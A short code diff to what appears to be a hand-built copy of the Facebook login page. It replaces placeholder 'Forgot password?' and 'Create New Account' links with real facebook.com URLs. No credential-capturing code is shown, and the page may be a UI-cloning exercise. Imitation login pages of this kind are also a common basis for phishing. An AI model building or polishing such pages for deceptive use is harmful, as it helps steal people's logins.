--- a/facebook/index.html
+++ b/facebook/index.html
@@ -115,11 +115,11 @@
                 </div>
                 <button type="submit">Log In</button>
                 <div class="forgot-password">
-                    <a href="#">Forgot password?</a>
+                    <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgot password?</a>
                 </div>
                 <hr>
                 <div class="create-account">
-                    <a href="#">Create New Account</a>
+                    <a href="https://facebook.com/">Create New Account</a>
                 </div>
             </form>
         </div>
